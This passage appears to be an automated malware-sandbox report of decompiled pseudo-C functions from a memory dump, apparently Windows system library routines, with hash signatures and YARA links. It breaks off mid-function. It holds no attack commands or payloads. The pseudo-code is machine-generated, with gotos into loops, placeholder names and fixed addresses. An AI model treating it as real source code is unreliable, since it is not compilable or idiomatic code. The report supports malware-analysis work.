                                                      0x0168fc8c
                                                      0x0168fb80
                                                      0x0168fb72
                                                      0x0168fb5e
                                                      0x0168fc8d
                                                      0x0168fc91
                                                      0x0168fadf
                                                      0x0168fadf
                                                      0x0168fae1
                                                      0x0168fae4
                                                      0x0168fae7
                                                      0x0168faec
                                                      0x0168faf8
                                                      0x0168fb00
                                                      0x0168fb07
                                                      0x0168fb0f
                                                      0x0168fb0f
                                                      0x0168fb07
                                                      0x00000000
                                                      0x0168faf8
                                                      0x0168fadd

                                                      Strings
                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 016CBE0F
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                      • API String ID: 0-865735534
                                                      • Opcode ID: 45a594efb285f376b1a6e6d0e0d77eba54e4a62f1d9dddfd1d45dc7dc7aff6c0
                                                      • Instruction ID: 695847754e5089ae7247afaa02f7fbbdbddabfcdfc0097b056c4ec89014adb7b
                                                      • Opcode Fuzzy Hash: 45a594efb285f376b1a6e6d0e0d77eba54e4a62f1d9dddfd1d45dc7dc7aff6c0
                                                      • Instruction Fuzzy Hash: 81A1F571B006068BEB25EF6CCC5077AB7A5EF48B60F0446ADEA06DB781DB30D941CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01652D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 63%
                                                      			E01652D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1745350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1747bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E016997C0();
				}
				if( *0x17479c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x17479c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01681624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01677D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E016EFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01699520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0168E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L016ADF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1746901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1746901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01699980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E016995D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01677D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01677D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E016D7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E016EFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1745350;
							if(_t109 != 0x1745350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E016EFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E016E5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                      0x01652d8a
                                                      0x01652d8a
                                                      0x01652d92
                                                      0x01652d96
                                                      0x01652d9e
                                                      0x01652da0
                                                      0x01652da3
                                                      0x01652da5
                                                      0x01652da8
                                                      0x01652dab
                                                      0x01652db2
                                                      0x016af9aa
                                                      0x016af9ab
                                                      0x016af9ae
                                                      0x016af9ae
                                                      0x01652db8
                                                      0x01652dc2
                                                      0x016af9b9
                                                      0x016af9be
                                                      0x016af9bf
                                                      0x016af9bf
                                                      0x01652dcf
                                                      0x016af9c9
                                                      0x01652dd5
                                                      0x01652dd5
                                                      0x01652dd5
                                                      0x01652dde
                                                      0x01652de1
                                                      0x01652e70
                                                      0x01652e72
                                                      0x01652e72
                                                      0x01652de7
                                                      0x01652deb
                                                      0x01652e7c
                                                      0x01652e83
                                                      0x01652e85
                                                      0x01652e8b
                                                      0x01652e8d
                                                      0x01652e92
                                                      0x01652e92
                                                      0x01652e85
                                                      0x01652df1
                                                      0x01652df7
                                                      0x01652df9
                                                      0x01652df9
                                                      0x01652dfc
                                                      0x01652dff
                                                      0x01652e02
                                                      0x00000000
                                                      0x01652e05
                                                      0x01652e0c
                                                      0x016af9d9
                                                      0x01652e12
                                                      0x01652e12
                                                      0x01652e12
                                                      0x01652e1a
                                                      0x016af9e3
                                                      0x016af9e9
                                                      0x016af9f0
                                                      0x016af9f6
                                                      0x016af9f8
                                                      0x016af9f8
                                                      0x016af9f0
                                                      0x01652e23
                                                      0x016afa02
                                                      0x016afa03
                                                      0x016afa05
                                                      0x016afa06
                                                      0x00000000
                                                      0x01652e29
                                                      0x01652e29
                                                      0x01652e2e
                                                      0x01652e34
                                                      0x01652e3e
                                                      0x00000000
                                                      0x00000000
                                                      0x01652e44
                                                      0x01652e47
                                                      0x01652e4d
                                                      0x00000000
                                                      0x00000000
                                                      0x01652e4f
                                                      0x01652e54
                                                      0x00000000
                                                      0x00000000
                                                      0x01652e5a
                                                      0x01652e5f
                                                      0x01652e9a
                                                      0x01652ea4
                                                      0x01652ea5
                                                      0x01652ea8
                                                      0x01652eaf
                                                      0x01652eb2
                                                      0x01652eb5
                                                      0x016afae9
                                                      0x016afaeb
                                                      0x016afaed
                                                      0x016afaef
                                                      0x016afaf7
                                                      0x016afaf8
                                                      0x016afafd
                                                      0x016afaff
                                                      0x016afb04
                                                      0x016afb04
                                                      0x016afaff
                                                      0x01652ec0
                                                      0x01652ec4
                                                      0x01652ec6
                                                      0x01652ec8
                                                      0x016afb14
                                                      0x016afb18
                                                      0x016afb1e
                                                      0x016afb21
                                                      0x016afb21
                                                      0x01652ece
                                                      0x01652ece
                                                      0x01652ece
                                                      0x01652ed7
                                                      0x01652e61
                                                      0x01652e63
                                                      0x016afa6b
                                                      0x016afa71
                                                      0x016afa76
                                                      0x016afa78
                                                      0x016afa8a
                                                      0x016afa7a
                                                      0x016afa83
                                                      0x016afa83
                                                      0x016afa8f
                                                      0x016afa91
                                                      0x016afa97
                                                      0x016afa9d
                                                      0x016afaa4
                                                      0x016afaaa
                                                      0x016afaaf
                                                      0x016afab1
                                                      0x016afac3
                                                      0x016afab3
                                                      0x016afabc
                                                      0x016afabc
                                                      0x016afac8
                                                      0x016afacb
                                                      0x016afadf
                                                      0x016afadf
                                                      0x016afacb
                                                      0x016afaa4
                                                      0x016afa91
                                                      0x01652e6f
                                                      0x01652e6f
                                                      0x01652e5f
                                                      0x016afa13
                                                      0x016afa15
                                                      0x016afa17
                                                      0x016afa1f
                                                      0x016afa21
                                                      0x016afa22
                                                      0x016afa25
                                                      0x016afa28
                                                      0x016afa2f
                                                      0x016afa2f
                                                      0x016afa2a
                                                      0x016afa2a
                                                      0x016afa2a
                                                      0x016afa31
                                                      0x016afa34
                                                      0x016afa36
                                                      0x016afa3c
                                                      0x016afa3e
                                                      0x016afa41
                                                      0x016afa43
                                                      0x016afa45
                                                      0x016afa45
                                                      0x016afa41
                                                      0x016afa3c
                                                      0x016afa4a
                                                      0x016afa4f
                                                      0x016afa51
                                                      0x016afa53
                                                      0x016afa56
                                                      0x016afa5b
                                                      0x016afa5e
                                                      0x00000000
                                                      0x016afa5e
                                                      0x01652e23

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Re-Waiting
                                                      • API String ID: 0-316354757
                                                      • Opcode ID: a93bc292373c7943d5be559b5900ea681e6937fc383b7b97ed4724fd122726c0
                                                      • Instruction ID: 6f54c2416ad1143715b9414127cd9096b4acfe70ab944deb5d861768461f8f26
                                                      • Opcode Fuzzy Hash: a93bc292373c7943d5be559b5900ea681e6937fc383b7b97ed4724fd122726c0
                                                      • Instruction Fuzzy Hash: FB610431A00645DFEB22DB6CCCA4BBEBBA5EB44714F1406ADDE11973C1C734AD428B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01720EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E01720EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0171FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01721074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01699730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0171A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0171A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1748b04 >> 0x14) + (_v44 -  *0x1748b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01677D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0171138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01677D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0170FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1748724 & 0x00000008) != 0) {
						E017152F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E017215B5(0x1748ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                      0x01720eb7
                                                      0x01720eb9
                                                      0x01720ec0
                                                      0x01720ec2
                                                      0x01720ecd
                                                      0x0172105b
                                                      0x0172105b
                                                      0x01721061
                                                      0x01721066
                                                      0x01721066
                                                      0x0172106b
                                                      0x01721073
                                                      0x01721073
                                                      0x01720ed3
                                                      0x01720ed6
                                                      0x01720edc
                                                      0x01720ee0
                                                      0x01720ee7
                                                      0x01720ef0
                                                      0x01720ef5
                                                      0x01720efa
                                                      0x01720efc
                                                      0x01720efd
                                                      0x01720f03
                                                      0x01720f04
                                                      0x01720f06
                                                      0x01720f07
                                                      0x01720f09
                                                      0x01720f0e
                                                      0x01720f14
                                                      0x01720f23
                                                      0x01720f2d
                                                      0x01720f34
                                                      0x01720f34
                                                      0x01720f14
                                                      0x01720f52
                                                      0x00000000
                                                      0x00000000
                                                      0x01720f58
                                                      0x01720f73
                                                      0x01720f74
                                                      0x01720f79
                                                      0x01720f7d
                                                      0x01720f80
                                                      0x01720f86
                                                      0x01720fab
                                                      0x01720fb5
                                                      0x01720fc6
                                                      0x01720fd1
                                                      0x01720fe3
                                                      0x01720fd3
                                                      0x01720fdc
                                                      0x01720fdc
                                                      0x01720feb
                                                      0x01721009
                                                      0x01721009
                                                      0x01721015
                                                      0x01721027
                                                      0x01721017
                                                      0x01721020
                                                      0x01721020
                                                      0x0172102f
                                                      0x0172103c
                                                      0x0172103c
                                                      0x01721048
                                                      0x01721050
                                                      0x01721050
                                                      0x01721055
                                                      0x00000000
                                                      0x01721055
                                                      0x01720f88
                                                      0x01720f9e
                                                      0x01720fa2
                                                      0x01720fa9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01720fa9
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: fd618f0b0e160d89db70973902715f2b0362b7d6010a607b2b998932c8053083
                                                      • Instruction ID: a0f488f77676b62612bbff525e6d15d49c78fc21019c9b6814b95b9f2d2f17db
                                                      • Opcode Fuzzy Hash: fd618f0b0e160d89db70973902715f2b0362b7d6010a607b2b998932c8053083
                                                      • Instruction Fuzzy Hash: 47518B713043829FE325DF28D884F2BBBE5FBC4614F04092DFA9697295D674E806CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0168F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E0168F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01674120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01699830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01699990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E016995D0();
							goto L11;
						} else {
							_t109 = L01674620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0169F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E016995D0();
										L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                      0x0168f0d3
                                                      0x0168f0d9
                                                      0x0168f0e0
                                                      0x0168f0e7
                                                      0x0168f0f2
                                                      0x0168f0f4
                                                      0x0168f0f8
                                                      0x0168f100
                                                      0x0168f108
                                                      0x0168f10d
                                                      0x0168f115
                                                      0x0168f116
                                                      0x0168f11f
                                                      0x0168f123
                                                      0x0168f124
                                                      0x0168f12c
                                                      0x0168f130
                                                      0x0168f134
                                                      0x0168f13d
                                                      0x0168f144
                                                      0x0168f14b
                                                      0x0168f152
                                                      0x016cbab0
                                                      0x016cbab0
                                                      0x0168f158
                                                      0x0168f158
                                                      0x0168f15a
                                                      0x0168f160
                                                      0x0168f165
                                                      0x0168f166
                                                      0x0168f16f
                                                      0x0168f173
                                                      0x016cbaa7
                                                      0x016cbaa7
                                                      0x016cbaab
                                                      0x00000000
                                                      0x0168f179
                                                      0x0168f18d
                                                      0x0168f191
                                                      0x016cbaa2
                                                      0x00000000
                                                      0x0168f197
                                                      0x0168f19b
                                                      0x0168f1a2
                                                      0x0168f1a9
                                                      0x0168f1af
                                                      0x0168f1b2
                                                      0x0168f1b6
                                                      0x0168f1b9
                                                      0x0168f1c4
                                                      0x0168f1d8
                                                      0x0168f1df
                                                      0x0168f1e3
                                                      0x0168f1eb
                                                      0x0168f1ee
                                                      0x0168f1f4
                                                      0x0168f20f
                                                      0x016cbab7
                                                      0x016cbabb
                                                      0x016cbacc
                                                      0x016cbad1
                                                      0x0168f215
                                                      0x0168f218
                                                      0x0168f226
                                                      0x0168f22b
                                                      0x00000000
                                                      0x0168f22b
                                                      0x0168f1f6
                                                      0x0168f1f6
                                                      0x0168f1f9
                                                      0x0168f1fb
                                                      0x0168f1fb
                                                      0x0168f1f4
                                                      0x0168f191
                                                      0x0168f173
                                                      0x0168f152
                                                      0x0168f203

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction ID: 24a7e3aaaf380692dd7912333f6b457da387508d4a48ec0364a2c060a27f9927
                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction Fuzzy Hash: A4517C71504711AFC320DF69C841A6BBBF9FF58750F008A2EFA9587690E7B4E904CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016D3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E016D3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x174d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01690BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E016D3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0169FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E016D3540;
						E0169FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E016ADDD0( &_v1072, _t75, _t79, _t80, _t81);
						E016E0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E016997C0();
					}
					return E0169B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E016D3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E016D3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0169FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01699650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E016D3787(_a4,  &_v352, _t80);
						}
					}
					L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E016995D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                      0x016d3552
                                                      0x016d355a
                                                      0x016d355d
                                                      0x016d3566
                                                      0x016d3567
                                                      0x016d357e
                                                      0x016d358f
                                                      0x016d35a1
                                                      0x016d35a5
                                                      0x016d366b
                                                      0x016d366b
                                                      0x016d366d
                                                      0x016d3672
                                                      0x016d3679
                                                      0x016d3685
                                                      0x016d368d
                                                      0x016d369d
                                                      0x016d36a7
                                                      0x016d36b8
                                                      0x016d36c6
                                                      0x016d36c7
                                                      0x016d36dc
                                                      0x016d36e1
                                                      0x016d36e7
                                                      0x016d36e9
                                                      0x016d36e9
                                                      0x016d3703
                                                      0x016d3703
                                                      0x016d35b5
                                                      0x016d35c0
                                                      0x016d35c4
                                                      0x00000000
                                                      0x00000000
                                                      0x016d35ca
                                                      0x016d35d7
                                                      0x016d35e2
                                                      0x016d35e6
                                                      0x016d35e8
                                                      0x016d35f5
                                                      0x016d35fa
                                                      0x016d3603
                                                      0x016d3604
                                                      0x016d3609
                                                      0x016d360a
                                                      0x016d3612
                                                      0x016d3613
                                                      0x016d361e
                                                      0x016d3622
                                                      0x016d3628
                                                      0x016d362f
                                                      0x016d362f
                                                      0x016d3636
                                                      0x016d3638
                                                      0x016d363b
                                                      0x016d3642
                                                      0x016d3642
                                                      0x016d3636
                                                      0x016d3657
                                                      0x016d3657
                                                      0x016d365c
                                                      0x016d3662
                                                      0x016d3669
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: 6c001e070ab39b5aadbc01d6c829ce6b69985389e5ac1add5d36b4f3501407f5
                                                      • Instruction ID: 7990de070e9132027fe1e047a2d8e449a1df37fef324f9e9b3068e569e6c9ef1
                                                      • Opcode Fuzzy Hash: 6c001e070ab39b5aadbc01d6c829ce6b69985389e5ac1add5d36b4f3501407f5
                                                      • Instruction Fuzzy Hash: FA4142F2D0056D9BDF21DA50CC84FAEB77DAB54714F0145E9EA09AB240DB309E88CF99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017205AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E017205AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E017207DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01699730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0171A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0171A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
